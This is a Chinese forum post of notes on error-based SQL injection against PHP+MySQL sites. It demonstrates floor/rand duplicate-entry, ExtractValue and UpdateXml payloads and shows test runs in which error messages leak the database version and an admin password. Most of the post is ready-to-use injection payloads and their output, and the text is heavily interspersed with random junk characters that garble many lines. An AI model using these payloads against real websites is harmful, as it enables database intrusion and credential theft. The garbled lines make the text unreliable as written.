放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
7 \; x8 w9 W4 J1 N实际测试环境:/ N. q7 N2 B2 a5 {+ C! B
* d# L) m R y+ M * t. }8 f' |. _: G- |# L7 U9 Y
mysql> show tables;, O) m. w' {" Z$ ^/ Z7 N
+----------------+* i0 m& N, z$ k
| Tables_in_test |
1 i9 A T+ P% M! ~- r+----------------+
, I- w% C0 t; Z0 x| admin |( S+ @' `# A+ a/ ?+ ?2 A
| article |; G) Y/ C4 p% S, f6 @# G
+----------------+! X* t* Y3 a7 q. q# m, E% ]& M) n
3 R5 m7 F, U1 ]# S% ? 8 \, _( D+ N+ j1 W" A
+ l/ M4 o; Y7 t3 R# @1 zmysql> describe admin;
8 N6 l: U) H* s s; Q' E0 R+-------+------------------+------+-----+---------+----------------+
) G: e+ |' |0 G% j! D| Field | Type | Null | Key | Default | Extra |' [, {% x* P9 T4 H1 u
+-------+------------------+------+-----+---------+----------------+
8 B! @' J% A m) V1 M- G$ |) v| id | int(10) unsigned | NO | PRI | NULL | auto_increment |! S3 w* c% S) P
| user | varchar(50) | NO | | NULL | |6 u+ A0 l4 O- l3 u/ |, f
| pass | varchar(50) | NO | | NULL | |8 E; M* c/ j- g$ a
+-------+------------------+------+-----+---------+----------------+, c0 Y* d$ ~) ^' G: q
$ E: ]# C1 }% ?8 v
' s8 R8 D7 a1 H6 L! A, F% D0 \
; a2 ]) X5 q$ r+ ^/ h( _mysql> describe article;4 w5 h- {) W; s
+---------+------------------+------+-----+---------+----------------+7 D; K; f& ^# z; n/ z# j/ a
| Field | Type | Null | Key | Default | Extra |
$ _7 @8 z" m3 @8 N/ i H/ J+---------+------------------+------+-----+---------+----------------+
/ x7 f" k4 E& [ m) s| id | int(10) unsigned | NO | PRI | NULL | auto_increment |" a% e9 b: y1 a8 T+ O' y
| title | varchar(50) | NO | | NULL | |
6 _1 C2 L( |, d6 o: K$ z| content | varchar(50) | NO | | NULL | |
! y( R# u" G9 a0 r+---------+------------------+------+-----+---------+----------------+
# W7 N0 ^% k; Z a* t9 Z# G1、通过floor报错5 F& S# \% j# j, P
可以通过如下一些利用代码
3 s3 d* y8 `* H& _+ j- m
' B3 W$ |. N$ {: j0 x' J ; z; P I" x( h5 z8 g! W
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
2 }& @: ?) p; ufrom information_schema.tables group by x)a);/ _: D1 h( A1 x$ u
3 l# Q0 H! u8 e- L: f 4 x" r# X5 l+ ]# x: z6 x' n- g
and (select count(*) from (select 1 union select null union select !1)x8 Z) m% |8 K: e+ H' }' u; h
group by concat((select table_name from information_schema.tables limit 1),4 w) M0 C7 o9 A+ d7 V
floor(rand(0)*2)));, g. w" d6 S* S& F
举例如下:; Z0 A, R$ {/ F
首先进行正常查询:
O% s6 L: C& Y! H* M0 f ; U/ Z6 f: s6 A' S
mysql> select * from article where id = 1;; q+ w2 x5 V" @/ L0 v
+----+-------+---------+
; h4 V1 c C/ R| id | title | content |& g) _$ j9 o2 K0 B! }4 P4 {
+----+-------+---------+- L" E. S$ o, t! O
| 1 | test | do it |( e! _# w# T. L3 ?. E
+----+-------+---------+
2 o- C. h9 M, }- U! o# g" A% U0 ~$ {假如id输入存在注入的话,可以通过如下语句进行报错。
/ {) u9 B e2 T
, K0 a% ~! R) t" M, [/ G4 } 8 B2 [. L' Z7 R \
mysql> select * from article where id = 1 and (select 1 from
- o) I% J! ~+ J(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
0 G4 Z j: g7 I* k! L8 [2 `ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'# c) o& q* m0 b7 f: v- K
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
! l/ W0 i. \3 q% q例如我们需要查询管理员用户名和密码:
# ?$ j. z) k( ]! F! z8 K! b/ IMethod1:
5 t% E! P' I3 m# g
# ^$ e3 N- l: H3 m D
+ _7 ?4 M) B4 c9 lmysql> select * from article where id = 1 and (select 1 from" n! r0 Q& q5 I' V4 c$ w* j5 K: t
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
! J& R5 g' ~6 s) [& sfrom information_schema.tables group by x)a);
% V# F4 C6 \' k5 H$ k; aERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'8 j6 o$ o" l% [1 {3 `1 u
Method2:
5 H& u2 L, ^ i# i2 ~: o
! Y. U6 C" f* R6 K) H2 A
3 d( F7 |3 d: Z7 k. T3 \mysql> select * from article where id = 1 and (select count(*)
* ^( B) T8 _0 @from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
]+ G9 Q& @) p3 v+ o: E1 Nfloor(rand(0)*2)));
, I- i+ G6 S5 D2 \/ r& lERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
' r! f9 _% A( b. E* J, p/ i6 Q2、ExtractValue6 S% f5 m) O" p- g4 J' M
测试语句如下
9 R. T& H% V8 m+ T: v
% ~2 O8 m8 j1 J3 d/ C2 y: H6 m1 i: a 0 c/ Q1 a, e6 e0 _# I
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
I3 _( L8 N/ \/ @实际测试过程
; ?8 z, N/ O4 v/ ^+ u; R
* \ g# G) b- s- g+ X% w 1 p% V1 x# P P0 L" _
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,: V8 ^9 j0 r* N" e8 j
(select pass from admin limit 1)));-- Q3 M: {3 H2 [3 k6 ?. D
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
) U" V6 q# a* b" H; ~3、UpdateXml
" _3 C. p( j( [测试语句. c. t {! w' L' r; |# B; }3 p; N
/ @+ r2 y1 v- D3 v( |* {$ A1 u4 ~1 G
. x2 R7 A9 K: xand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))1 `# a$ \, `1 U8 k" h) h
实际测试过程 b/ l) K* n9 { a
9 b9 R4 Q, r+ k$ e8 K
; o! D" \ d5 W4 Y
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
. D' A1 Y6 W$ i$ Z6 c! ?. J(select pass from admin limit 1),0x5e24),1));2 N" F$ P' e$ ]: I& R$ d
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
7 k. d+ K% ? h! M. \All, thanks foreign guys.0 [/ `) E! ]+ C$ L) y- W
; `0 Z% P' a" {3 T! z2 B2 } {
; R5 L; V. ?4 p- K5 O |
发表于 2012-12-10 10:28:51
收藏
支持
反对